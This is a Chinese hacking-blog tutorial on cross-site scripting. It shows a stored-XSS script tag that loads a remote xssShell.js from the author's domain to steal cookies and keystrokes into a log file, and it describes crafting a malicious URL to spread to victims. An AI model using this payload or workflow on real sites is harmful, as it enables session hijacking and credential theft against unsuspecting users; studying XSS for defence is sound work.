危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2289 浏览18787848

再次解析跨站技术

一、XSS原理

最近在研究XSS把研究经过写出来供大家研究,形成XSS的原因是没有对客户端提交的/HTML代码进行检查,这样会导致恶意用户向提交恶意的JS/HTML代码,当访问被XSS的页面时,由于浏览器本身有解释HTML和JS语言的能力,因此浏览器解析页面时会导致执行从数据库中取回的HTML/JS代码。

二、xssShell编写及利用

为了方便研究我自己编写了存在xss漏洞的页面,aspx编写的,接受数据的也是aspx编写的。测试页面的结构。

1.漏洞页面Demo.aspx

一般测试XSS漏洞语句为“<script>alert('跨站了by危险漫步)</script>”如果存在XSS漏洞会弹出一个对话框,现在我们测试下漏洞页面,在文本框输入“<script>alert('跨站了by危险漫步')</script>”点击“xss测试”弹出了对话框跨站成功。

下面是我写的一个简单的Xssshell.js来盗取信息Request.aspx接受盗取的信息,把盗取的信息写到xss.txt。

2.Requests.aspx文件后台代码部分:

作用是接受xssShell.js提交的c00kie键盘输入信息,在实际应用的时候这个文件要上传到自己的服务器上

3.xssShell.js:

由于比较长,所以文章中就不写了,感兴趣的同学可以在光盘里看下。这个xssShell.js的作用就是盗取Cookie和用户键盘输入信息还有网站目录,然后发送请求提交到Requests.aspx,然后Requests.aspx文件会生成xss.txt来记录盗取的信息。

三、实战

我们要做的就是在跨站的地方远程调用xssShell.js然后把盗取的信息写到xss.txt里面,现在我们在文本框输入“<SCRIPT a=">"SRC="http://www.weixianmanbu.com/xs/xssShell.js"></SCRIPT>“这样就能加载我们的xssShell.js了,然后点击”提交”。

然后会生成一个xss.txt的文本用来保存截取受攻击者的url和Cookie等信息,现在我们访问下xss.txt看看是不是成功了记录下了Cookie和网站信息。

我们在刚才提交跨站语句的地方输入些字符看能不能记录下来我输入“xsssxsssxsssxsssxssss”,在访问下xss.txt成功记录了下来。

在实际的利用中大家可能会网上发包含远程js的跨站url,由于提交时post提交所以我要自己构造这个跨站URL,这个可以用火狐的”Live HTTP headers”插件抓包获取到演示下怎么使用,选择工具。

然后选择Live HTTP headers然后会弹出这个抓包插件。

我们打开存在跨站的页面输入跨站代码点击提交,然后来到“Live HTTP headers”找到刚才抓的包然后点击Realpy。

然后找到刚才刚才提交的包。

这样我们就可以构造跨站url了。

然后把构造好的url发到网上,如果有人浏览就中招了。这就是常规的xss攻击流程,学的好的同学可以把这个js多加点功能。bye…… 

相关推荐